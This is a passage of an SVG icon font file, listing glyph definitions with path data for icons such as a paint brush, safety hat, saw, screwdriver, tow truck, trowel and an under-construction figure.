<glyph glyph-name="paint-brush" horiz-adv-x="1000" unicode="&#xe9aa;" d="M119 201c0-16 7-24 24-24l74 0c3 0 7 0 10-1 15-8 23-33 16-49-34-78-16-147 32-215 48 67 65 136 33 213-2 6-4 14-3 21 1 19 15 31 34 31 23 0 47 0 70 0 12 0 22 7 22 17 1 16 0 31 0 46h-312c0-13 0-26 0-39z m283 184l-2 0c-1 16-2 33-3 50-9 0-17-1-25 0-8 0-10-3-11-10-2-13-6-26-8-39l-2 0c-2 16-3 32-5 48h-34c-3-16-6-32-8-47-4 13-6 27-8 40-1 3-3 7-5 7-12 1-23 1-35 1-3-17-5-33-8-48l-2 0c-2 16-5 31-7 47h-34c-2-16-4-32-6-48-3 6-4 13-6 19-5 31-5 31-37 29 0 0-1 0-3-1-1-15-2-32-3-48h-2c-4 16-8 33-12 49h-25c5-39 10-78 15-116h298c5 39 10 77 15 116h-24c-5-17-9-33-13-49z m-276-80v-47h297v47h-297z m703 378c0 6-2 11-1 16 5 49-24 83-85 83-103-1-207 3-311 4-83 1-166 2-249 1-46 0-71-27-71-73-1-29-1-58 0-87 0-36 20-59 55-66 12-2 25-2 38-2 178 2 356 4 534 7 69 1 85 16 89 86 0 3 1 5 2 8 29 2 38-5 38-33 1-30 1-59 0-89 0-33-6-41-38-48-82-17-165-34-247-50-52-10-69-29-71-81 0-7-3-17-7-18-27-11-27-34-21-55 10-36 2-71-1-107-6-77-7-154-8-231 0-8 7-20 26-25 11-2 24-2 36-1 21 2 33 13 31 35 0 17-1 34-1 51-2 51-1 103-7 154-5 46-16 91-1 138 6 16-2 30-18 38-4 2-8 7-9 12-8 36 11 63 48 70 87 17 175 35 262 53 31 7 46 25 46 58 1 28 1 56 1 85-1 48-12 61-60 67z" />
<glyph glyph-name="pollution" horiz-adv-x="1000" unicode="&#xe9ab;" d="M893 271c0 4 2 9-3 13-72-44-144-88-219-133v135c-75-46-147-89-221-135v135c-63-39-123-76-185-115-1 5-2 7-2 9-5 95-10 190-15 285-1 9-2 13-12 13-31-1-61-1-91 0-8 0-12-2-12-11-4-66-7-132-11-197-6-114-12-228-19-342-1-12 2-16 15-16 68 1 137 1 206 1 185 0 369 0 554 0 13 0 15 3 15 15 0 114 0 228 0 343z m-488-269c-28 1-56 0-83 0-8 0-11 3-11 11 0 28 0 56 0 84 0 8 3 10 10 10 28 0 55-1 83 0 9 0 11-3 10-11 0-14 0-28 0-42h0c0-13 0-27 1-41 0-8-1-11-10-11z m213 11c0-7-2-11-10-11-29 1-57 1-85 0-7 0-10 3-10 10 0 29 1 58 0 86 0 7 3 9 9 9 15 0 29 0 43 0 14 0 28-1 42 0 8 0 11-2 11-11-1-27 0-55 0-83z m199-8c-10-10-31-2-48-3l-43 0c-7 0-10 3-10 10 1 28 1 57 0 85 0 8 4 10 11 10 28 0 56 0 83 0 8 0 10-3 10-10 0-14 0-29 0-46-1-14 8-36-3-46z m56 534c-1-5-2-9-4-14-27 25-63 40-102 40-58 0-108-33-134-80-16 18-28 40-36 66-5-18-5-33 0-47 4-10 1-16-5-22-30-40-81-55-130-39-42 14-69 42-80 85-1 9-1 12 8 15 14 4 26 12 34 28-45-20-87-21-130 2 0-10 5-16 10-20 7-5 6-10 2-15-13-21-28-36-56-33-24 2-48 1-72 0-10 0-18 3-25 10-32 30-41 67-27 108 14 40 44 62 85 66 30 3 60 2 89-16-4 13-10 24-21 29-13 6-9 13-3 21 25 36 67 52 113 41 40-9 67-41 74-85 3-18-1-35-5-55 19 10 29 23 30 43 0 10 3 12 12 12 11-1 22-2 32-6 8-3 10 0 9 8-3 50 35 91 76 103 45 13 101-7 130-45 14-18 19-39 18-62 7-1 11 3 12 7 3 16 12 10 20 6 58-25 90-89 76-151z m-8-108c-1 4-2 9-3 13-4 15-12 29-23 40-6 7-14 13-22 18-1 1-1 1-1 0l-17-30c-6-9-11-19-17-28 0-1-1-1 0-1 10-6 14-15 15-26 0 0 0 0 1 0 1 0 2 0 4 0h29v0h34c1 0 1 0 1 0 0 5-1 9-1 14z m-128-14c0 2 0 4 0 6 2 9 7 15 14 20 1 0 1 0 1 1-12 19-23 39-35 58 0 0 0 0-1 0-11-7-21-16-29-26-13-18-19-37-19-58 0-1 0-1 0-1h34v0h15c6 0 13 0 19 0 1 0 1 0 1 0z m45-26c0 0 0 0-1 0-5-3-10-4-16-4-4 0-8 1-11 3-1 0-2 1-2 1-1 0-1-1-1-2l-33-57c-1 0-1-1 0-1 11-6 23-10 36-12 4-1 8-1 13-1 2 0 4 0 5 0 3 1 6 1 9 1 5 1 10 2 15 4 7 2 14 5 20 8 0 0 0 1 0 1l-8 14c-9 15-17 30-26 45z m-15 6c11 0 19 9 20 20-1 11-9 20-20 20-11 0-20-9-20-20 0-11 9-20 20-20z m96 112c-24 26-58 42-96 42-54 0-101-33-120-79-7-16-11-34-11-52 0-72 59-131 131-131 72 0 131 59 131 131 0 35-14 65-35 89z m-96-205c-64 0-116 52-116 116 0 15 3 29 8 42 17 44 59 74 108 74 35 0 66-16 88-40 17-21 28-47 28-76 0-64-52-116-116-116z" />
<glyph glyph-name="power-zone" horiz-adv-x="1000" unicode="&#xe9ac;" d="M932 649c-74 0-147 0-221 0-7 0-11-3-16-8-73-74-146-148-219-223-3-2-8-5-6-9 1-5 7-3 10-3 42 0 84 0 126 0 4 0 9 1 11-5 2-5-3-7-6-9l-140-132c-24-22-48-45-73-68 7-4 12-3 17-3 33 0 66 0 99 0 4 0 9 0 11-4 3-5-1-8-4-11-17-21-35-44-54-65-49-55-96-112-144-169-2-3-9-6-5-10 4-4 7 2 11 4 2 2 3 3 5 5 89 71 178 143 266 215 49 39 98 79 147 118 3 2 8 4 5 8-1 3-5 2-8 2-27 0-53 0-80 0-5 0-10-1-13 4-3 6 3 9 6 12 68 62 135 124 203 186 3 3 8 5 8 10-4 4-9 2-13 2l-58 1c-5 0-12-2-14 4-3 6 4 9 8 12 46 42 92 83 138 124 4 3 10 5 8 12-2 0-3 0-5 0z m-521-512c15 1 30 5 45 8 8 1 13 9 13 15 0 6-9 3-14 3-14 1-28 0-48 0-25-1-57 0-89 7-149 31-245 176-226 317 15 120 83 200 193 244 34 14 70 18 107 16 51-3 99-17 142-44 35-21 64-49 88-83 1-2 2-8 8-6 12 4 16 18 9 28-64 85-148 128-254 130-49 1-97-10-141-30-135-62-209-219-172-363 40-155 180-255 339-242z m-154 533c-5 9-9 10-17 5-76-52-116-124-120-216 0-9 3-10 10-10 24 0 48 0 71 0 24 0 48 0 72 0 7 0 11 0 11 10 2 30 14 56 39 73 9 6 8 11 4 18-24 40-47 80-70 120z m6-449c29-14 60-23 95-26 3-1 7 2 11 5 32 31 65 62 98 93 4 4 4 7 1 12-11 19-22 38-33 57-3 7-6 7-13 4-25-11-51-12-77-1-5 2-8 1-11-4-25-43-49-86-74-128-4-6-3-9 3-12z m219 242c39 40 79 81 119 121 4 4 4 7 1 12-21 31-47 58-78 78-5 4-8 3-11-2-24-44-49-87-75-131-2-4-2-6 2-9 24-17 35-41 39-70 1 1 2 1 3 1z m-101-78c39-1 70 30 70 70 0 39-31 70-70 70-38-1-69-31-70-70 0-38 32-70 70-70z" />
<glyph glyph-name="radio-active" horiz-adv-x="1000" unicode="&#xe9ad;" d="M785 380h-132c-6 0-12-1-18-1-1 0-2 0-2 2-2 50-24 87-66 113-2 1-2 2-1 4 25 42 50 84 75 126 25 44 51 88 76 132 2 3 1 3 5 1 37-22 70-48 99-80 47-51 81-111 100-178 5-19 9-38 12-58 3-20 4-39 5-59 0-2-1-3-4-3-49 0-99 0-149 0v1z m-570-1c-50 0-100 0-150 0-2 0-3 1-2 3 1 95 29 180 84 257 36 48 79 87 131 117 2 2 2 2 4-1 50-85 101-171 151-257 2-2 1-3-1-4-33-20-54-50-62-89-2-7-3-15-3-23 0-2-1-3-3-3-28 1-57 1-85 1h-64l0-1z m287-437c-22 0-41 1-61 4-56 8-108 26-157 53-2 2-3 2-1 5l146 253c2 3 2 7 5 7 2 1 4-2 7-3 15-8 32-12 49-14 27-2 51 4 75 17 1 0 2 1 3-1 38-66 76-132 114-199 12-20 24-40 36-61 1-2 0-3-2-4-27-15-56-28-86-37-22-7-44-12-66-15-14-2-27-3-40-4-8-1-16-1-22-1z m85 438c0-49-39-87-87-87-48 0-87 38-87 87 0 48 38 87 87 87 49 0 87-39 87-87z" />
<glyph glyph-name="recycle-alt" horiz-adv-x="1000" unicode="&#xe9ae;" d="M266 554c20-12 40-24 60-36 5-3 6-1 9 3 14 25 28 49 42 74 13 23 25 47 43 67 21 23 45 39 76 41 35 1 61-16 84-40 21-23 33-52 49-78 3-4 0-5-3-7-11-8-23-14-33-23-16-14-14-31 4-42 2-1 5-3 8-4 39-15 77-30 116-45 28-11 52 5 52 35 1 41 1 83 0 124 0 25-19 36-41 24-9-5-17-10-25-16-5-4-7-4-11 2-14 26-28 50-47 73-28 34-62 62-106 76-2 1-5 1-8 2-35 8-72-1-72-1-24-6-46-17-66-33-26-19-47-43-65-70-24-38-46-78-69-117-2-5 0-7 3-9z m670-385c-3 29-11 56-23 82-20 43-46 83-69 124-2 4-4 4-7 2-20-12-40-25-61-36-5-3-4-6-1-10 18-31 36-63 54-95 11-19 20-39 24-61 10-49-12-93-59-112-26-11-55-13-83-13-19 0-19 0-20 18 0 3 0 6 0 9-5 24-21 33-44 25-9-3-17-9-25-14-24-15-49-30-73-45-13-9-23-20-21-37 1-16 12-25 24-33 20-12 40-25 60-37 13-8 25-18 40-22 17-4 30 3 36 19 3 6 4 12 4 18 0 17 0 17 17 17 43-1 86 5 126 23 47 22 82 55 96 107 3 9 5 19 7 29v39c-1 1-2 2-2 3z m-244 122c2 110-87 198-192 196-106 0-191-85-191-191 0-108 86-193 196-191 103 2 184 85 187 186z m-124 145c20-10 36-23 51-39 5-6 4-9-2-13-12-6-24-13-37-17-3-1-5-2-7 2-7 28-18 53-36 77 12-1 22-6 31-10z m-122-154c-2 14 0 28 1 42 0 4 2 4 5 4 32-6 64-6 96 0 3 1 5 0 5-4 0-10 2-19 2-29-1-8-2-16-2-24 0-6-2-7-7-6-26 5-53 5-79 2-1 0-2 0-3 0-5 0-12-5-16-1-3 3-1 10-2 16z m58 163c19-24 33-52 42-82 1-4 0-5-4-6-14-3-28-3-42-4-14 1-27 1-41 4-4 1-5 1-4 6 8 30 22 57 42 82 2 3 4 4 7 0z m-125-52c21 26 49 45 82 53 0 0 1 0 2 0-6-9-12-17-17-26-8-15-14-32-18-48-1-5-3-7-8-5-14 6-28 11-40 19-3 2-4 4-1 7z m-16-169c-23 46-24 91-4 137 2 6 4 8 10 3 13-12 28-20 44-25 6-2 8-4 7-11-3-20-3-42 0-62 1-7-1-10-7-12-19-7-35-17-50-30z m26-37c0 1-1 2-2 3-12 14-12 13 4 22 10 6 19 10 30 14 2 0 5 2 6-3 7-28 19-54 38-78-31 8-55 22-76 42z m115-39c-3-5-5-4-8 0-19 24-32 51-41 81-2 5 0 6 4 7 14 1 27 4 44 3 11 0 24-1 37-3 4-1 7-2 5-8-9-29-22-56-41-80z m118 52c-22-28-50-46-87-55 20 24 31 50 38 77 1 4 2 5 6 4 15-6 28-12 42-20 2-2 3-3 1-6z m-36 54c-5 2-6 5-6 9 3 22 3 44 0 67 0 5 2 7 7 9 16 6 32 14 45 25 5 4 6 4 9-1 9-21 14-43 15-64-1-26-6-48-16-69-2-4-3-6-7-2-14 12-30 20-47 26z m-168-211c0 6-1 7-7 7-24 0-48 0-72 0-15 0-31 0-47 0-24 0-49 1-73 8-56 17-83 63-71 120 6 30 21 55 36 81 3 4 5 2 7 0 8-4 15-10 23-13 22-11 40 0 40 24 0 42 0 84 0 126 0 25-18 40-42 36-5 0-9-2-14-4-18-7-36-14-54-22-21-8-41-16-61-24-25-12-27-32-5-49 6-4 12-8 18-12 7-4 17-8 19-14 2-7-6-14-11-22-24-45-43-92-41-145 1-53 23-96 65-127 43-31 91-43 142-45 47-1 94 0 140 0 7 0 8 2 8 8 0 22 0 45 0 67z" />
<glyph glyph-name="recycling-man" horiz-adv-x="1000" unicode="&#xe9af;" d="M639 381c2-4 2-10 10-9 54 1 107 1 161 2 5 0 7 2 7 7-1 24 1 48-5 71-15 55-31 110-45 165-3 13-8 16-20 15-64-3-127-5-191-8v0c-67-3-133-5-200-8-4 0-8-1-11-2-6-1-10-5-11-11-1-7 2-12 7-16 4-2 9-4 14-5 68-15 136-30 204-44 19-4 30-14 37-32 13-42 28-83 43-125z m183-441l-3 379c0 7-1 10-9 10-52 1-103 3-155 4-7 1-10-2-11-9-3-25-7-50-10-75-11-75-22-150-32-225-4-28-8-57-12-85-1-3-3-7 1-8 4-1 7 0 9 4l4 6c16 30 33 60 50 89 24 42 48 84 73 128 2-7 4-11 6-16 25-67 50-134 75-202 1-4 2-10 9-9 7 0 5 6 5 9z m-112 725c33 1 61 28 61 61 0 34-27 62-61 62-34 0-61-27-61-61 0-34 27-62 61-62z m-452-338c22-33 13-30 50-14 31 13 53 36 74 62 12 16 23 33 42 42 4 2 3 6 3 9-4 22-11 44-26 62-14 17-22 18-41 6-21-14-34-34-49-53-16-22-36-38-62-46-8-2-11-6-10-13 1-21 7-39 19-55z m6 54c29 11 49 31 67 55 11 16 23 31 39 43 7 5 12 5 17-3 4-6 9-12 12-19 10-22 9-23-7-41-13-15-26-32-40-47-16-19-36-35-60-44-3-1-7-4-10 0-12 14-21 30-25 51 0 2 3 4 7 5z m211-109c-47-1-94 0-141 0-48 0-96-1-144 0-9 0-14-1-11-12 3-11 4-23 6-35 17-100 34-201 50-301 1-10 5-12 13-11 56 0 111 0 166-1 12 0 16 4 18 15 18 111 36 222 54 333 2 12-2 12-11 12z m-240-226h-4c-2 9-4 19-5 29-1 0-1 1-1 2h10v-31z m0 57h-14c-2 9-3 18-5 27 0 2 0 3 0 4h19v-31z m0 57h-24c-1 1-1 3-1 5 0 3 0 6-1 9-1 8-2 13-1 16h27l0-30z m0 60c0-2 0-3-1-4h-32c0 0 0 0 0 0-1 12-6 23-4 35h37v-31z m44-283h-25v26h25v-26z m0 53c0 0 0-1 0-1h-25v31h25v-30z m0 56h-25v30l0 1h25v-31z m0 57h-25v31h25v-31z m0 57l0 0h-25v30h25v-30z m0 56h-25v35h25v-35z m44-279h-25v26h25l0-26z m0 52l0 0h-25v31h25v-31z m0 57h-25v31h25l0-31z m0 57h-25v31h25l0-31z m0 57h-25v30h25l0-30z m0 56l-25 0v33c0 0 0 1 1 2h24v-35z m45-279h-26v26h25l1-1v-25z m0 55c-1-1-1-2-1-3h-25v31h25c0 0 1-1 1-1v-27h0z m0 54l0 0h-26v31h26v-31z m0 57h-26v31h26v-31z m0 58l-1-1h-25v30h25c1-1 1-1 1-2v-27z m0 55h-26v35h26v-35z m44-279h-26v21c1 2 2 3 3 5h23v-26z m0 52h-26v31l0 0h26l0-31z m0 57h-26v27c1 2 1 3 1 4h25l0-31z m0 57h-26v31h26v-31z m0 57h-26v30h26v-30z m0 56h-26v35h26v-35z m28-142c-2-10-4-19-5-28h-5v31h10c0-1 0-2 0-3z m8 52c-1-7-2-13-3-20 0-1 0-2 0-3h-15v31h20c0-3-1-6-2-8z m10 62c-1-8-2-16-3-24-1-2-1-3-2-4h-23v25c1 1 1 3 2 5h26c0-1 0-2 0-2z m9 49c-1-3-1-7-2-10-1-5-1-9-2-12h-33v33c0 1 1 2 1 3h37c1-3 0-7-1-14z" />
<glyph glyph-name="safety-hat-light" horiz-adv-x="1000" unicode="&#xe9b0;" d="M910 301c-26 28-57 44-93 55-10 3-12 8-10 17 6 21 4 42-2 62-23 70-66 102-142 70-17-7-32-19-49-27 17 31 40 55 74 67 13 5 11 8 3 17-141 153-376 147-508 4-47-51-72-110-80-178-1-8-2-16 8-21 95-53 190-108 292-147 50-19 101-35 156-32 11 0 16 4 16 16 2 59 1 118-13 176-24 97-76 172-170 212-4 1-7 3-9 5-5 3-6 7-4 12 1 7 6 5 11 4 13 0 23-9 34-15 74-37 127-93 158-170 27-67 38-137 39-209 0-14 3-17 17-12 50 20 93 50 130 89 3 3 5 11 12 7 5-4 6-9 6-15-2-10-7-18-12-25-32-38-73-64-115-90-30-19-63-24-97-22-79 7-154 29-224 66-75 39-145 88-218 131-31 19-32 19-51-14 0-1-1-2-1-3-9-18-7-29 10-40 13-9 28-16 43-21 114-37 221-89 322-154 45-29 92-55 143-72 63-22 126-29 189 2 61 31 110 76 146 135 25 42 22 84-11 120z m-143 41c-15-19-38-20-55-2-27 29-27 96 0 125 16 18 41 17 56-2 14-18 19-38 18-60 1-23-4-44-19-61z" />
<glyph glyph-name="safety-hat" horiz-adv-x="1000" unicode="&#xe9b1;" d="M913 289c-27 33-62 51-101 64-9 4-13 7-15 17-32 132-105 232-234 282-113 43-224 29-325-39-80-54-126-131-135-228-1-10 1-15 10-20 93-52 185-105 284-144 48-19 97-33 148-35 28-2 31 1 32 29 1 32 0 64-3 96-6 56-18 111-47 160-32 55-76 98-136 122-7 3-16 5-12 14 4 10 12 4 19 3 2-1 3-2 5-2 85-37 146-97 181-183 26-65 36-132 38-201 1-25 1-25 24-15 46 19 86 47 120 83 4 4 7 13 15 9 8-5 7-14 5-22-5-12-13-23-22-32-29-28-63-50-97-72-38-25-79-29-122-24-78 9-150 34-219 71-74 40-143 87-215 131-16 9-24 8-33-7-24-34-21-47 17-66 6-3 12-6 18-8 76-28 152-54 223-94 56-32 111-66 167-98 56-32 115-56 190-56 27-1 60 6 91 24 55 30 100 71 135 125 26 41 26 78-6 116z" />
<glyph glyph-name="saw" horiz-adv-x="1000" unicode="&#xe9b2;" d="M673 324c-1 3-1 4-1 4-151 152-303 303-454 455-9 9-12 4-18-2-32-33-64-65-97-97-10-10-15-20-16-34-2-39-2-39 36-49 12-3 18-7 18-22-2-35-1-36 32-43 17-4 23-10 21-28-4-29-3-30 26-36 22-4 31-15 26-37-3-15 1-24 19-28 35-8 36-9 33-45-1-11 3-17 14-19 6-1 11-3 17-4 19-2 28-11 23-31-5-21 4-30 26-35 30-5 31-7 27-37-2-17 3-25 19-26 4-1 8-3 11-3 21-1 25-12 24-31-3-28-1-28 27-35 9-1 12 0 15 7 32 83 91 140 172 176z m214-138c-29 29-59 59-88 88-22 22-50 33-87 34-9 1-22-4-35-10-65-30-114-77-145-142-21-44-15-90 18-125 34-36 69-71 105-106 21-20 41-16 55 10 6 11 10 24 16 35 33 64 82 110 147 138 50 22 53 39 14 78z m-64-19c-49-20-90-51-123-93-17-22-30-46-41-72-9-20-17-21-32-6-13 13-26 25-38 39-13 13-17 29-10 47 32 77 87 132 164 164 6 2 12 3 15 4 15 0 26-4 34-13 13-13 25-25 38-37 15-16 14-25-7-33z" />
<glyph glyph-name="screw-driver" horiz-adv-x="1000" unicode="&#xe9b3;" d="M873 788c21-22 42-43 62-64 2-3 3-10 1-13-28-56-57-112-86-168-2-4-8-7-12-8-29-7-58-13-87-20-7-1-13-5-18-9-35-35-70-71-105-105-8-8-7-12-1-20 11-17 22-34 32-52 6-10 4-18-5-26-18-17-35-34-51-52-11-12-23-14-36-6-9 6-15 5-23-3-9-10-19-19-29-28 7-14 14-27 20-39 5-12 4-22-7-31-74-74-147-147-220-222-11-10-21-13-33-6-24 15-50 30-72 48-48 39-90 83-123 135-24 38-24 41 8 73 69 68 137 136 205 205 11 11 20 14 33 7 8-4 17-7 24-12 10-8 16-5 23 3 3 3 6 6 9 9 14 11 23 23 10 42-5 7-2 15 5 22 19 18 38 37 57 56 7 8 14 10 23 5 20-12 40-24 59-36 3-2 5-4 9-7 3 3 6 6 9 9 35 34 70 69 104 104 5 5 9 12 10 19 7 28 12 56 19 84 2 6 6 13 11 16 58 30 115 59 175 90z m-745-667c2-17 10-29 25-35 16-7 30-3 41 9 51 50 101 101 152 152 17 17 17 38 2 53-15 15-38 15-54-1-51-51-102-101-152-152-6-7-9-17-14-26z m101-100c2-16 11-30 24-36 16-6 30-2 42 10 51 50 102 101 152 151 16 16 16 39 2 53-15 15-38 16-54 0-51-51-102-102-152-153-7-7-10-16-14-25z" />
<glyph glyph-name="tools-1" horiz-adv-x="1000" unicode="&#xe9b4;" d="M311 415c-5 6-8 14-21 11-70-19-140-37-210-55-26-7-16-30-14-43 3-14 12-10 20-10 50-1 101-1 151-1 9 0 17 1 22-9 19-36 38-70 7-111-11-15-19-24-38-23-22 2-43 1-65 1-26 0-51 0-77-1-9 0-17 0-19-12-1-14-13-35 14-42 69-17 137-34 206-53 10-2 15-1 22 8 26 36 46 78 79 110 5 5 4 117-1 123-30 32-50 72-76 107z m228-121c1-32 1-64 0-96 0-11 4-15 15-15 112 0 224 0 335 0 25 1 41 19 42 44 1 10 0 21 0 31 0 35-16 51-51 51-53 0-105 0-158 0h-163c-10 0-20 2-20-15z m276-20c16-1 25-12 26-29-1-17-11-26-28-27-14-1-28 15-27 30 2 17 12 27 29 26z m7-107c-3 4-8 5-13 5h-133c11-15 20-27 30-42-60 0-115 0-171 0-13-1-13 8-13 17v212l31-32 0 0 1-1v0c3-3 8-6 14-6 43 0 85 0 133 0-98 124-193 244-287 364l-5-2v-19c0-207 0-414-1-621 0-21 7-26 27-26 159 1 318 0 477 0 8 0 16-2 26 5-39 49-78 97-116 146z" />
<glyph glyph-name="tools-bag" horiz-adv-x="1000" unicode="&#xe9b5;" d="M520-42c-62-2-123 2-185 8-65 6-129 16-192 32-7 2-10 6-13 12-37 66-59 137-65 212-8 89 3 175 36 258 9 21 20 41 30 61 4 6 8 8 14 10 40 10 80 18 120 23 10 1 15 4 13 14 0 3 0 7 0 10-2 11 2 17 13 18 10 1 13 8 15 16 0 4 1 8 2 11 14 48 18 53 67 62 9 2 14 5 18 14 6 15 15 24 34 23 50-2 100-1 151 0 17 1 27-7 32-21 4-12 12-16 22-18 5-1 10-3 16-4 21-1 31-14 36-33 3-9 6-16 8-25 3-13 6-26 24-27 6-1 6-6 6-12 1-26 1-26 26-30 36-5 71-13 106-21 8-2 12-5 16-12 52-93 72-192 67-297-5-82-26-159-67-231-4-7-8-11-17-13-64-16-130-26-196-33-46-4-91-6-137-7z m10 76c91 2 182 11 272 29 8 2 14 6 18 14 23 52 37 107 40 164 6 81-7 157-41 230-3 8-8 12-16 14-46 10-93 17-140 22-79 8-159 10-238 6-77-4-153-12-228-28-9-2-13-6-16-14-22-45-34-93-40-142-9-87 3-170 38-250 4-9 10-14 20-16 109-23 220-30 331-29z m74 554c5 2 16-7 15 6-1 15 5 22 19 24 4 1 8 2 6 8-2 7-3 14-7 21-5 10-27 11-34 2-5-7-10-10-19-10-55 0-110 0-165 0-8 0-14 2-17 9-5 10-13 8-22 7-15-2-19-12-23-24-3-8-2-13 7-14 12-2 19-7 16-20-1-8 2-11 10-10 14 1 28 2 42 2 57 2 114 2 172-1z m150-288c-14 0-27 0-41 0-7 0-9-2-9-9 0-17 0-34 0-51 0-9 3-13 12-12l79 0c8 0 10-1 6-10-18-36-45-59-87-61-28-1-55-2-80 16-13 9-25 20-32 35-3 6-7 9-15 9-58 0-117 0-175 0-7 0-11-3-14-8-20-35-50-52-91-52-35-1-67 5-91 33-8 9-13 19-19 30-2 6-1 8 6 8 27 0 54 0 81 0 9-1 12 2 12 11-1 17-1 34 0 50 0 9-4 11-11 11-27 0-54 0-80 0-9 0-10 2-6 10 15 37 53 62 93 61 15 0 30 1 44-3 27-7 48-23 61-48 4-7 9-10 17-10 58 1 115 1 173 1 7 0 11 1 14 7 22 40 56 54 100 53 39 0 69-13 91-45 5-7 13-16 9-24-2-5-14-2-22-2-8-1-17 0-25 0z" />
<glyph glyph-name="tow-truck" horiz-adv-x="1000" unicode="&#xe9b6;" d="M938 362c-1 4-2 8-4 12l-135 202c-5 7-12 11-20 11h-182c-13 0-24-11-24-24v-268h-37v78c0 24-3 35-17 45-14 10-347 239-347 239-7 5-16 3-21-3l-18-23c-5-6-4-16 2-21l51-56v-168c0-18-14-32-32-32-18 0-33 14-33 32 0 2-2 4-4 4-2 0-4-1-4-4 0-22 18-40 41-40 22 0 40 18 40 40v159l160-174v-76h-260c-17 0-31-14-31-32v-82c0-17 14-32 31-32h78c0-60 49-109 109-109s110 49 110 109h255c0-60 49-109 109-109 61 0 110 49 110 109h49c13 0 24 11 24 24v188l0 1z m-256 6v146h93l97-146h-190z m-401-273c-30 0-54 24-54 54 0 31 24 55 54 55 30 0 55-24 55-55 0-30-25-54-55-54z m474 0c-30 0-54 24-54 54 0 31 24 55 54 55 30 0 55-24 55-55 0-30-25-54-55-54z" />
<glyph glyph-name="trolley" horiz-adv-x="1000" unicode="&#xe9b7;" d="M860 205c-45 34-110 31-153-8-5-4-9-6-16-6-15 1-31-2-46-5-3-1-6-3-10-1 17 14 34 24 52 33 50 23 104 33 158 36 6 0 12 0 18 1 3 0 7 1 7 4 1 4-2 6-5 7-4 3-8 5-12 7-41 22-83 43-124 64-117 59-235 119-353 179-25 13-39 5-41-24-1-17-2-34-3-52h-2c-3 13-7 25-10 37-10 45-30 84-61 118-34 38-73 68-116 94-13 8-25 16-39 23-13 5-30 0-38-13-7-12-4-21 10-32 37-26 74-51 109-81 46-41 79-89 91-151 7-36 14-72 21-108 9-47 19-95 39-139 28-64 75-92 144-88 25 1 50 6 75 12 34 7 68 16 103 20 9 1 11-1 10-11-7-60 31-115 88-131 57-15 115 12 142 65 25 52 10 114-38 150z m-24-143c-19-23-52-30-80-17-27 12-43 43-38 73 2 7 4 9 12 6 14-6 27-15 37-26 13-13 24-15 35-5 13 11 15 28 5 41-11 14-25 25-41 36 24 10 57-1 74-24 18-26 17-60-4-84z m78 264c-139 71-278 142-417 213-41 20-82 41-123 62-18 9-36 4-44-12-7-16-1-33 18-42l270-138 268-136c21-11 39-8 48 9 9 16 1 34-20 44z" />
<glyph glyph-name="trowel" horiz-adv-x="1000" unicode="&#xe9b8;" d="M938 621c-50-40-105-69-161-97-39-19-78-37-120-48-20-5-39-6-55 9-3 3-6 2-9 0-14-9-27-17-42-26-4-2-4-6-4-10-1-31-1-61-2-91l-3-70c0-6-2-9-8-11-36-14-71-28-108-40l42 38c3 3 7 6 10 8 17 10 21 26 21 44-1 46 4 91 2 137-1 15 5 25 18 33 16 9 31 19 47 28 5 3 6 6 4 11-6 21 1 36 19 46 67 40 130 85 197 124 15 9 31 19 48 26 6 3 12 3 18 0 18-7 35-16 49-28 19-16 31-36 35-61 0-2 1-4 1-6l1-16z m-565-417c34 9 68 19 102 28 24 7 48 14 72 21 9 3 16 2 23-3 38-24 76-48 113-72 12-7 19-16 19-31-1-5-4-9-6-14-8-14-20-21-36-26-168-46-335-92-502-139-15-4-28-3-40 5-27 15-46 37-54 67-3 10-1 18 5 27 73 103 146 207 219 311 7 9 13 18 22 24 15 12 30 16 49 7 22-10 40-26 59-41 16-13 33-27 49-41 6-4 6-7 2-12-29-34-59-67-88-100-3-3-6-6-9-10 1 0 1-1 1-1z" />
<glyph glyph-name="under-construction-alt" horiz-adv-x="1000" unicode="&#xe9b9;" d="M937-60c-2 6-5 10-9 15-11 13-23 25-42 27-6 0-15-2-19 6-6 9-14 15-24 18-6 1-7 4-6 9 2 11-1 20-6 29-10 22-28 39-58 30-4-1-7 2-8 5-7 13-17 24-28 34-21 20-46 23-73 16-20-5-35-18-47-34-3-5-6-5-11-1-15 13-31 26-47 39-54 43-108 87-162 130-3 3-4 4-1 9 23 42 46 84 69 127 9 16 18 33 27 49 10 16 10 31 2 46-24 42-55 81-82 121-9 13-20 19-37 19-58-1-116-1-174 0-26 0-36-12-43-32-9-24-12-49-18-74-4-17-8-33-12-51-6 5-11 9-15 13-5 5-11 8-18 10-5 1-8-2-11-4-2-3-6-6-4-11 3-6 6-12 12-16 9-5 17-12 25-18 3-3 8-5 8-9 0-15 9-22 21-27-10-10-20-20-29-29-5-4-9-9-9-15 0-10-2-20-2-30 1-56 0-112 0-167 0-3 0-6 0-9-14-54-28-109-41-163-4-16-4-32 5-47 11-22 43-25 61-11 12 9 18 22 22 36 14 53 27 106 40 160 4 12 9 25 9 37-1 41 0 81 1 123l10-12c29-36 58-72 86-108 3-3 5-5 3-10-28-56-54-112-81-168-8-17-11-33-1-50 11-18 35-23 52-16 14 6 22 19 30 31 13 20 23 43 35 65 22 41 42 84 64 125 9 16 8 38-1 49-8 8-15 17-23 25-2 3-2 4-1 7 3 3 5 0 6-1 6-4 11-9 17-13 59-48 119-95 178-142 5-4 6-6-1-9-15-6-28-16-36-31-5-10-10-19-24-16 0 0-2-2-3-2-16-7-25-19-27-36-1-4-3-6-7-7-5 0-11-1-17-1-24-2-43-15-57-33-3-3-6-7-5-11 2-4 7-2 11-2 172 0 344 0 516 0 2 0 4 1 6 0 5 0 5 2 4 6z m-732 535c5 22 10 45 15 68 0 3 2 5 5 5 17-2 34 1 50-3l-70-70z m124-150c-2-4-5-4-8-1-13 10-25 20-38 30-5 4-3 6 1 7 24 10 47 20 70 30 5 2 9 6 16 5-14-24-27-47-41-71z m211 273c42 0 83 30 85 84-1 46-35 84-84 84-50 1-83-36-84-83-1-46 34-84 83-85z" />
